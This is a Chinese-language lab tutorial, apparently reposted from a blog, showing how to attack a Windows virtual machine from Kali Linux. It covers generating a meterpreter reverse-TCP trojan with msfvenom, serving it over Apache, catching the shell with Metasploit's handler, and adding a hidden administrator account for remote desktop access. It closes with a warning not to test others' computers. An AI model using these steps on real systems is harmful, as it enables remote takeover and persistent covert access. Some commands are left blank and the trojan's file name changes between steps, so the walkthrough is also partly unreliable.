利用kali Linux 滲透windows 操作系統(tǒng)

一、實(shí)驗(yàn)?zāi)康模菏褂胟ali生成木馬，滲透windows系統(tǒng)

二、實(shí)驗(yàn)內(nèi)容：

使用kali中的Metasploit生成木馬，控制windows系統(tǒng)

三、實(shí)驗(yàn)環(huán)境

需要從VMware Workstation 中創(chuàng)建兩臺虛擬機(jī)

一臺kali linux和一臺靶機(jī)windows系統(tǒng)

1、攻擊者ip(kali) 192.168.63.21

2、靶機(jī)ip（windows）192.168.63.20

四、實(shí)驗(yàn)步驟

先將虛擬機(jī)的網(wǎng)絡(luò)模式修改為橋接模式

設(shè)置靶機(jī)ip（windows）

? ? ?從右下角網(wǎng)絡(luò)右鍵打開網(wǎng)絡(luò)和共享中心

點(diǎn)擊本地連接

點(diǎn)擊屬性

找到ipv4，雙擊點(diǎn)開

設(shè)置ip地址

查看靶機(jī)(windows)的ip地址

win+r輸入cmd

進(jìn)入終端后輸入ipconfig查看ip

ip地址為192.168.63.20 設(shè)置成功

設(shè)置kali的ip

ifconfig eth0 [要修改的IP地址] netmask [子網(wǎng)掩碼]

（重啟后生效）

重啟后進(jìn)入終端輸入ifconfig查看ip地址

ip地址為192.168.63.21

保證兩個系統(tǒng)能相互ping通

生成木馬，在kali打開終端輸入以下命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=攻擊者ip lport=監(jiān)聽端口 -f 后門文件類型 >/后門文件保存路徑/evilshell.txt

進(jìn)入木馬文件存放路徑，將木馬文件evilshell.exe復(fù)制到 /var/www/html, 輸入命令：

進(jìn)入目錄 /var/www/html,將html目錄下的其余文件刪除，輸入命令:

開啟apache服務(wù)，輸入命令：

/etc/init.d/apache2 start

可以用以下命令查看服務(wù)開啟狀態(tài)：

/etc/init.d/apache2 status?

出現(xiàn)綠色的字代表服務(wù)已經(jīng)開啟

在windows7靶機(jī)上打開瀏覽器輸入kali的IP，訪問kali并下載木馬文件evilshell.exe

將文件下載到桌面

開啟postgresql服務(wù)，其端口號為5432，輸入命令

/etc/init.d/postgresql start

可以用/etc/init.d/postgresql status查看服務(wù)開啟狀態(tài)

查看端口，輸入命令

netstat -ntulp

開啟msfconsole,輸入命令

msfconsole

設(shè)置攻擊模塊并運(yùn)行，輸入命令：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 攻擊者IP

set LPORT 監(jiān)聽端口

show options

run

在靶機(jī)中雙擊運(yùn)行木馬文件(evilshell.exe)

獲取目標(biāo)主機(jī)shell,輸入命令

shell

出現(xiàn)亂碼現(xiàn)象,輸入命令:

chcp 437

輸入ipconfig查看靶機(jī)的ip地址

在靶機(jī)中添加一個隱藏用戶（后面加$）,并提升隱藏用戶的權(quán)限，輸入以下命令

net user host$ /add

net user

net user host$ 密碼

net localgroup administrators host$ /add

net user host$

kali打開一個新的終端，使用遠(yuǎn)程桌面連接靶機(jī)（靶機(jī)需要開啟遠(yuǎn)程連接服務(wù)），輸入命令

rdesktop 靶機(jī)ip

使用 host$密碼 登錄靶機(jī),登錄成功后，使用管理員權(quán)限打開cmd.添加一個新用戶，添加成功則證明滲透成功！

添加用戶:

添加用戶成功，表示滲透成功！

用靶機(jī)端切換用戶

可以查看到這里出現(xiàn)一個被攻擊者添加的一個用戶

實(shí)驗(yàn)結(jié)果：我們在攻擊靶機(jī)的時候獲取到的權(quán)限僅僅為獲取靶機(jī)的IP地址，對其IP進(jìn)行滲透，靶機(jī)端訪問了我們做好的木馬文件，結(jié)果就被入侵了。

注：（此教程僅用于測試 切勿拿他人電腦惡意測試）

?。?！不要將IP提供給他人，不要下載并運(yùn)行陌生的軟件，如果是木馬文件，可能會被黑客攻擊文章來源地址http://www.zghlxwxcb.cn/news/detail-450996.html

到了這里，關(guān)于利用kali Linux 滲透windows 操作系統(tǒng)的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！